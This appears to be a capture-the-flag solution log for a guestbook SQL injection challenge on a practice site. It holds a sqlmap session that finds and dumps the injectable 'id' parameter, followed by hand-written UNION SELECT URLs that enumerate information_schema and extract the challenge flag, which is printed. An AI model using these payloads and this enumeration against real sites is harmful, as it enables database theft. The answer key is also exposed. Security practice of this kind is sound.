root@kali:~# sqlmap --sqlmap-shell
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.11#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

sqlmap-shell> -p id --current-db --all -u 'https://hackme.inndy.tw/gb/?mod=read&id=9' 
[11:20:16] [WARNING] there was a problem writing the history file '/root/.sqlmap/history/sqlmap.hst' ([Errno 2] No such file or directory)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:20:16

[11:20:16] [INFO] testing connection to the target URL
[11:20:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:20:21] [INFO] testing if the target URL content is stable
[11:20:22] [INFO] target URL content is stable
[11:20:24] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[11:20:25] [INFO] testing for SQL injection on GET parameter 'id'
[11:20:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:20:33] [WARNING] reflective value(s) found and filtering out
[11:20:34] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="aaa")
[11:24:13] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[11:26:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mod=read&id=9 AND 6827=6827

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: mod=read&id=9 OR SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: mod=read&id=-1236 UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x5954586b69475a6a6d7745554472507276744c576a506851494d6e4a686a77704c6d74786a535267,0x7162767671),NULL-- AWqz
---
[11:58:39] [INFO] the back-end DBMS is MySQL
[11:58:39] [INFO] fetching banner
web application technology: Nginx
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner:    '5.7.30-0ubuntu0.18.04.1'
[11:58:39] [INFO] fetching current user
current user:    'guestbook@localhost'
[11:58:39] [INFO] fetching current database
current database:    'g8'
[11:58:39] [INFO] fetching server hostname
hostname:    'pwn'
[11:58:39] [INFO] testing if current user is DBA
[11:58:39] [INFO] fetching current user
[11:58:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[11:58:43] [INFO] fetching database users
[11:58:43] [INFO] used SQL query returns 1 entries
database management system users [1]:
[*] 'guestbook'@'localhost'
Database: g8                                                                   
Table: flag
[3 entries]
+----+----------------------------------------------------+----------+----------+
| id | flag                                               | padding1 | padding0 |
+----+----------------------------------------------------+----------+----------+
| 1  | http://i.giphy.com/3o72FdPiRXBRbBLUc0.gif          | 31415926 | 1337     |
| 2  | FLAG{Y0U_KN0W_SQL_1NJECT10N!!!' or 595342>123123#} | 88       | 77       |
| 3  | http://i.giphy.com/m7BTtLWhjkEJa.gif               | 9999     | 6666     |
+----+----------------------------------------------------+----------+----------+




#####################################
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,database(),4
g8
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='g8' limit 0,1),4
flag
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 0,1),4
id
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4
flag
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 2,1),4
padding0
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 3,1),4
padding1

https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select flag from g8.flag limit 0,1),4
http://i.giphy.com/3o72FdPiRXBRbBLUc0.gif
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select flag from g8.flag limit 1,1),4
FLAG{Y0U_KN0W_SQL_1NJECT10N!!!' or 595342>123123#}
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select flag from g8.flag limit 0,1),4
http://i.giphy.com/m7BTtLWhjkEJa.gif